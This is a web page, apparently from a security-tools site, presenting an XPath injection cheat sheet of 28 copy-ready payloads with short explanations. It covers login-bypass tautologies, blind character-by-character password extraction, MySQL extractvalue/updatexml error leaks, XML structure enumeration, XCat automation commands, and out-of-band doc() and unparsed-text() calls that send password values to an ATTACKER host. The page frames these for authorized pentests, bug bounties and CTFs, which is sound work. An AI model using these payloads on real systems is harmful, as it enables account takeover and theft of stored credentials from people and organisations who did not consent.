XPath Injection Cheat Sheet

Real, public XPath/XQuery injection techniques for authorized pentests, bug bounties, and CTFs — auth bypass, blind boolean extraction, error-based leaks, and out-of-band exfil. (28 payloads)

Build custom XPath payloads in the XPath Injection generator

Authentication Bypass

(6)

' or '1'='1

Classic tautology. When the app builds a query like //users[username/text()='INPUT' and password/text()='INPUT'], this makes the predicate always true and returns the first user node. Inject into either field.Unquoted/single-quote string context; login forms backed by XML user stores

' or 1=1 or ''='

Tautology that balances the trailing quote so the resulting expression stays syntactically valid (... and password='' or 1=1 or ''='').Use when '1'='1 breaks on the trailing quote in the password predicate

admin' or '1'='1

Selects the admin node specifically (or any user when 1=1 holds), bypassing the password check while still landing on a privileged account.When you want a specific known username rather than the first node

' or position()=1 or ''='

Forces selection of the first user node in document order without needing 1=1. Useful when arithmetic comparisons are filtered but XPath functions are allowed.Filtered-keyword WAFs that block 1=1 but allow position()

x' or name()='username' or 'x'='y

Bypass using the name() node-test instead of value comparison; true for any element named username, so the predicate matches and auth passes.Alternative tautology when value-based comparisons are sanitized

") or ("1"="1

Double-quote variant for queries that wrap user input in double quotes, e.g. //user[name="INPUT"]. Closes the string and injects an always-true OR.Double-quoted string context

Boolean-Based Blind

(6)

' and string-length(//user[1]/password)>10 and ''='

Blind oracle on the length of the first user's password. App returns success/failure (different page/behavior) depending on whether the condition is true; binary-search the length.Blind injection where only true/false behavior is observable

' and substring(//user[1]/password,1,1)='a' and ''='

Tests whether the first character of the target node equals 'a'. Iterate the character and position to extract the value one char at a time.XPath substring() is 1-indexed; loop position 1..length

' and substring(//user[1]/password,1,1)>'m' and ''='

Comparison form of the char oracle — enables binary search over the character set instead of linear guessing, roughly halving requests per character.Faster blind extraction via ordinal comparison

' and count(//user)=3 and ''='

Confirms the number of nodes matching a path. Binary-search the count to learn how many records (e.g., users) exist before extracting them.Node-count oracle for enumeration sizing

' and starts-with(//user[1]/password,'a') and ''='

Tests a string prefix. Often allowed where substring() is filtered; chain growing prefixes ('a','ab','abc'...) to extract values left to right.When substring() is blocked but starts-with() is allowed

' and contains(//user[1]/password,'adm') and ''='

Substring-presence oracle. Confirms whether a fragment exists anywhere in the node value; handy for verifying guessed tokens or known patterns.Existence checks / dictionary confirmation

Error-Based

(5)

'

Single unbalanced quote. Triggers an XPath/XQuery parse error in many engines, confirming injection and often leaking the engine name and the surrounding query fragment.Detection — verbose error pages

extractvalue(1,concat(0x7e,(//user[1]/password)))

MySQL extractvalue() takes an XPath argument; concatenating a '~' with the target node forces an 'XPATH syntax error' that prints the extracted value in the error message.MySQL >=5.1 — error-based XPath data exfiltration

updatexml(1,concat(0x7e,(SELECT version())),1)

MySQL updatexml() error-based leak. The bogus XPath built around the subquery surfaces the result in the truncated 'XPATH syntax error' string (max ~32 chars).MySQL — alternative to extractvalue; pair with substring() to page long values

' and count(//*) = 1 and string(1 div 0) and ''='

Forces a divide-by-zero / type error conditionally. The error fires only when the preceding predicate is true, turning verbose errors into a boolean oracle.Engines that raise on div-by-zero; conditional error oracle

'+substring(name(/*[1]),1,1)+'

If the app reflects evaluated output (or errors on type mismatch), this surfaces the first character of the root element name, helping fingerprint document structure.Reflected/erroring contexts for structure discovery

Node & Structure Enumeration

(6)

' or name(/*[1])='root' or ''='

Tests the name of the document root element. Iterate candidate names (or extract char-by-char) to learn the top-level tag of the backing XML document.Blind discovery of the root node name

count(/*)

Counts top-level (root) elements. Combined with count(/*[1]/*) you can walk the tree breadth-first to map the document structure.Direct-output contexts; structure mapping

' and count(/*[1]/*[1]/@*)>0 and ''='

Checks whether the first grandchild element has attributes. Use to discover where sensitive data is stored (attributes vs text nodes).Attribute discovery via @* axis

name(//user[1]/*[1])

Returns the tag name of the first child of the first user node — e.g., reveals field names like 'username', 'password', 'role' without prior schema knowledge.Child-element name enumeration

' or //*[contains(name(),'pass')] or ''='

Matches any element whose tag name contains 'pass', surfacing password-like fields anywhere in the document regardless of nesting depth.Keyword-based field hunting across the whole tree

//user[position()=1]/child::node()

Explicit axis syntax to dump all child nodes of the first user. Axis notation (child::, attribute::, descendant::) often bypasses filters targeting '/' shorthand.Direct-output contexts; filter evasion via long-form axes

XCat & Out-of-Band Exfiltration

(5)

xcat --method GET run "http://TARGET/?node=" true_string:"Welcome"

Automates boolean-blind extraction of the entire XML document. XCat injects char-by-char oracles for you using a known true-condition marker; far faster than manual scripting.Tool: XCat (github.com/orf/xcat) — blind XPath dumping

doc(concat('http://ATTACKER/', encode-for-uri(//user[1]/password)))

XPath 2.0 doc() out-of-band exfil. The engine fetches an attacker URL with the secret embedded in the path; read the value from your HTTP logs — works even with zero in-band output.XPath/XQuery 2.0 engines that permit doc() network access (e.g., Saxon, BaseX)

unparsed-text(concat('http://ATTACKER/x?d=', //password))

XQuery 3.0/3.1 OOB variant using unparsed-text() to trigger an outbound request carrying the leaked node value as a query parameter.XQuery 3.x engines; alternative when doc() is restricted

xcat --method GET run "http://TARGET/?q=" true_string:"found" --oob-ip ATTACKER_IP --oob-port 80

XCat in out-of-band mode. Uses the engine's doc()/HTTP feature to exfil data to XCat's built-in listener, dramatically reducing the request count versus pure blind extraction.XCat with an OOB-capable XPath 2.0 engine

' and doc-available('http://ATTACKER/ping') and ''='

OOB connectivity probe. A callback to your server confirms the engine supports network functions before committing to a full doc()-based exfil chain.Capability detection for XPath 2.0 doc-available()

ShareX LinkedIn Reddit

Level up your security testing

Install the CLI

npx payload-playground

Explore All Tools

Encoding, hashing, JWT & more

Browse Cheat Sheets

Quick-reference payload guides

Related Generators

XPath Injection

Related Cheat Sheets

SQL Injection Cheat Sheet NoSQL Injection Cheat Sheet LDAP Injection Cheat Sheet

Frequently asked questions

What is the XPath Injection Cheat Sheet?+

It's a quick-reference collection of 28 XPath payloads for testing XPath Injection vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.

How do I use these XPath payloads?+

Copy any payload straight into your authorized test, or open the XPath Injection generator to build customized XPath variants with encoding and WAF-bypass options. Only test systems you have explicit permission to assess.

Are these XPath payloads free to use?+

Yes — this cheat sheet and all XPath payloads are completely free, with no account required. Everything runs in your browser.

$loading...

Frequently asked questions

What is the XPath Injection Cheat Sheet?+

How do I use these XPath payloads?+

Are these XPath payloads free to use?+

Yes — this cheat sheet and all XPath payloads are completely free, with no account required. Everything runs in your browser.